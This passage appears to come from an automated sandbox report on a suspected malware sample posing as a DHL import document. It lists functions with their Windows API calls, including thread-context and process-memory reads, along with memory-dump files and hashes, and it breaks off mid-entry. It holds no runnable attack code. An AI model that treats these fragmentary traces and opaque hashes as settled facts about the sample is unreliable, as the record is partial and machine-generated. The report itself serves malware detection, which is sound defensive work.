                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03ABB991
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03ABB9B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 2438371351-0
                                                                                          • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                          • Instruction ID: b5b5c9d6cb0989e2fbd1abd52918c0d91f372468bdd63dd71abdb5be364df8d0
                                                                                          • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                          • Instruction Fuzzy Hash: DF12CD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                                                                                          Function 007EFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                          • Instruction ID: ab8acf8ebe9a63bcf10edc0254d430f37e2c9fa33b1403218b15e84c66622b52
                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                          • Instruction Fuzzy Hash: 82313674A01149DBC718CF1AD890969FBA1FF49300B7486A5E809CFA21E735EDC0CBD0
                                                                                          Function 007D4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E9C
                                                                                            • Part of subcall function 007D4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007D4EAE
                                                                                            • Part of subcall function 007D4E90: FreeLibrary.KERNEL32(00000000,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4EC0
                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4EFD
                                                                                            • Part of subcall function 007D4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E62
                                                                                            • Part of subcall function 007D4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007D4E74
                                                                                            • Part of subcall function 007D4E59: FreeLibrary.KERNEL32(00000000,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E87
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                          • String ID:
                                                                                          • API String ID: 2632591731-0
                                                                                          • Opcode ID: fab7577d9dd25f13f8ef8c228ecb434de284a99beca992b69fe413c15728093e
                                                                                          • Instruction ID: 16ee602f7b48415f1c520528dece9e28608977b892a0780f3c2a7eae84949ac4
                                                                                          • Opcode Fuzzy Hash: fab7577d9dd25f13f8ef8c228ecb434de284a99beca992b69fe413c15728093e
                                                                                          • Instruction Fuzzy Hash: E611E332600205EBCB14AF64DC0AFAD77B5AF40710F10842FF582A63E1EE789A459790
                                                                                          Function 00808402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wsopen_s
                                                                                          • String ID:
                                                                                          • API String ID: 3347428461-0
                                                                                          • Opcode ID: e4f044ed95bba4fe4ae70163a7cababf83bd9b23f9f28359db571eb116a77241
                                                                                          • Instruction ID: c4a87a35685b15b5ec50a41a1b06fbae0443d0921985a0aa6431332436615e38
                                                                                          • Opcode Fuzzy Hash: e4f044ed95bba4fe4ae70163a7cababf83bd9b23f9f28359db571eb116a77241
                                                                                          • Instruction Fuzzy Hash: AE11067590410AEFCB05DF58E9419DA7BF9FF48314F104059F808EB352DA31DA518BA5
                                                                                          Function 00805000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00804C7D: RtlAllocateHeap.NTDLL(00000008,007D1129,00000000,?,00802E29,00000001,00000364,?,?,?,007FF2DE,00803863,008A1444,?,007EFDF5,?), ref: 00804CBE
                                                                                          • _free.LIBCMT ref: 0080506C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 614378929-0
                                                                                          • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                          • Instruction ID: 0bc38dd9068a4e2ee021dd1a6a8872a851ca78f24b74dc9a5ffc418360cc628c
                                                                                          • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                          • Instruction Fuzzy Hash: 10012672204B046BE321CE699C85A5AFBECFB89370F25091DE184C32C0EA70A805CAB4
                                                                                          Function 007FE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                          • Instruction ID: 48f9c2f9f6675be88a5ad3503ad8e621b6de4f57f75ccb10fd8e4eeb1b33dce9
                                                                                          • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                          • Instruction Fuzzy Hash: 2CF0F932510E1CD6C6313E698C09B7A3398EF52330F100715F621D63E1DF78980185A6
                                                                                          Function 007D9CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 176396367-0
                                                                                          • Opcode ID: a1aab6b1abdf35b971cbb30c4e90fbef234579797177db4f7ef5b95bc5723019
                                                                                          • Instruction ID: d07c30484d8bb036cab99e64c19f4283361f7e2af63b116d7a2e1791b46c4ebb
                                                                                          • Opcode Fuzzy Hash: a1aab6b1abdf35b971cbb30c4e90fbef234579797177db4f7ef5b95bc5723019
                                                                                          • Instruction Fuzzy Hash: ACF0C8B3601604BED7149F39DC06AA7BBA4EB44760F10852EF719CB2D1DB75E51087E0
                                                                                          Function 00804C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000008,007D1129,00000000,?,00802E29,00000001,00000364,?,?,?,007FF2DE,00803863,008A1444,?,007EFDF5,?), ref: 00804CBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 0d5d8080d561df3ef08b1ef06fd795130586040f8997855f92b4e00cc45793ca
                                                                                          • Instruction ID: 2b09573e6478308c98f77b0357ac5b2242c09b32023e9b434e50326c175be44c
                                                                                          • Opcode Fuzzy Hash: 0d5d8080d561df3ef08b1ef06fd795130586040f8997855f92b4e00cc45793ca
                                                                                          • Instruction Fuzzy Hash: 16F0B47268222CA7FB615F629C09B6B3788FF417A0F196111FB19E62C0CA75D80046E0
                                                                                          Function 00803820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: fd771449445a760e61456de60898e6529e2d1b73e72211a210ec8f91da17ff1c
                                                                                          • Instruction ID: 5ba0fe773e024161cda42b9985e3fcd4ce9ef2fca9a2e8407c610eac792a5b48
                                                                                          • Opcode Fuzzy Hash: fd771449445a760e61456de60898e6529e2d1b73e72211a210ec8f91da17ff1c
                                                                                          • Instruction Fuzzy Hash: 38E0E53210022897EB612A669C09BAB364CFF427B0F0580B1FD15D26D0CB15DE0181E0
                                                                                          Function 007D4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4F6D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: 689b037f994f91b3c6a4eff75a51597dfad1ce7d82bd22b2741e2a538ad19bb6
                                                                                          • Instruction ID: 9f5d3de207a1acfe96d165c2ac98288fd7bd47029f383778e4c3e94c7ab14fef
                                                                                          • Opcode Fuzzy Hash: 689b037f994f91b3c6a4eff75a51597dfad1ce7d82bd22b2741e2a538ad19bb6
                                                                                          • Instruction Fuzzy Hash: EDF01571105752CFDB349F64D494822BBF4AF14329328897FE2EA82621CB399844DB10
                                                                                          Function 0083CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0081EE51,00893630,00000002), ref: 0083CD26
                                                                                            • Part of subcall function 0083CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0083CD19,?,?,?), ref: 0083CC59
                                                                                            • Part of subcall function 0083CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0083CD19,?,?,?,?,0081EE51,00893630,00000002), ref: 0083CC6E
                                                                                            • Part of subcall function 0083CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0083CD19,?,?,?,?,0081EE51,00893630,00000002), ref: 0083CC7A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Pointer$Write
                                                                                          • String ID:
                                                                                          • API String ID: 3847668363-0
                                                                                          • Opcode ID: b3c7b0d6bfeff5efef1428c2b631f0bed33b9303e7b4619f525998f3f45b760a
                                                                                          • Instruction ID: eac18f8e5f67b317e1d6cd744a3b55daf479af043ed6f68882571097501fc130
                                                                                          • Opcode Fuzzy Hash: b3c7b0d6bfeff5efef1428c2b631f0bed33b9303e7b4619f525998f3f45b760a
                                                                                          • Instruction Fuzzy Hash: EFE03076400604EFC7219F4AD9008AABBF8FFC5250710852FE996D2110D3B5AA14DBA0
                                                                                          Function 007D2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D2DC4
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongNamePath_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 541455249-0
                                                                                          • Opcode ID: d76f0f7d9c9ea178c829ccde00ec2685fa21c4e16e64ca5c0683a0fadcd89ca8
                                                                                          • Instruction ID: 93877461de5c48076c2c6392766cfe5d407b98c6dcc8ebedd2688874c4a144a1
                                                                                          • Opcode Fuzzy Hash: d76f0f7d9c9ea178c829ccde00ec2685fa21c4e16e64ca5c0683a0fadcd89ca8
                                                                                          • Instruction Fuzzy Hash: 06E0CD726041245BCB10A2589C09FEA77EDEFC8790F050072FD09D7348DA64AD808551
                                                                                          Function 007D2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D3908
                                                                                            • Part of subcall function 007DD730: GetInputState.USER32 ref: 007DD807
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007D2B6B
                                                                                            • Part of subcall function 007D30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 007D314E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                          • String ID:
                                                                                          • API String ID: 3667716007-0
                                                                                          • Opcode ID: b4b2d49049da61f142132eb721698b29abbf4ef8ecbef03176c0d35307266213
                                                                                          • Instruction ID: 80d8a7b6c20ae0bbb4c4b06ae293710d5172ec970c78ce1211a11f69c34c19e6
                                                                                          • Opcode Fuzzy Hash: b4b2d49049da61f142132eb721698b29abbf4ef8ecbef03176c0d35307266213
                                                                                          • Instruction Fuzzy Hash: 20E0862170424486CA04BB75A85E57DA77AABD6751F40153FF14283363DE6D494A4262
                                                                                          Function 0081039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00810704,?,?,00000000,?,00810704,00000000,0000000C), ref: 008103B7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: f289ee89d75701812b911b307ece94b7ffc231af202a0e546d1165aba5990b42
                                                                                          • Instruction ID: 8c1ada390269e52d1fc7502bdf92dd0d457f777b3f75f449ca2a5ede14d7afae
                                                                                          • Opcode Fuzzy Hash: f289ee89d75701812b911b307ece94b7ffc231af202a0e546d1165aba5990b42
                                                                                          • Instruction Fuzzy Hash: 52D06C3204010DBBDF028F84DD06EDA3BAAFB48714F014000FE5856020C772E821AB90
                                                                                          Function 007D1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 007D1CBC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoParametersSystem
                                                                                          • String ID:
                                                                                          • API String ID: 3098949447-0
                                                                                          • Opcode ID: 80711f163051f31152efb1e592e208704c9156594c7aeff95888007a3c265abb
                                                                                          • Instruction ID: ad21e64bed08b3a5ac62a4a57df2c926041ab54aa08cf66781e6196779b1cbe0
                                                                                          • Opcode Fuzzy Hash: 80711f163051f31152efb1e592e208704c9156594c7aeff95888007a3c265abb
                                                                                          • Instruction Fuzzy Hash: A9C09B352803049FF6144B84BC4EF107754B349B10F045001F649559E3C3E11410DA50
                                                                                          Function 0084744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,007D949C,?,00008000), ref: 007D5773
                                                                                          • GetLastError.KERNEL32(00000002,00000000), ref: 008476DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 1214770103-0
                                                                                          • Opcode ID: fe9fa8e8ae1e90928967aa06976b06e1ef2c9a3bb22c5153c7a3c12e49cded3d
                                                                                          • Instruction ID: c47d694f6530169e7d057ea25feeb50b6eedaa04132e6fc129311f10b16fc274
                                                                                          • Opcode Fuzzy Hash: fe9fa8e8ae1e90928967aa06976b06e1ef2c9a3bb22c5153c7a3c12e49cded3d
                                                                                          • Instruction Fuzzy Hash: D4817C30208605DFCB15EF28C495A6AB7F1FF98314F05451EF8969B392DB34AD45CB92
                                                                                          Function 03ABC13C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(000001F4), ref: 03ABC151
                                                                                          Memory Dump Source
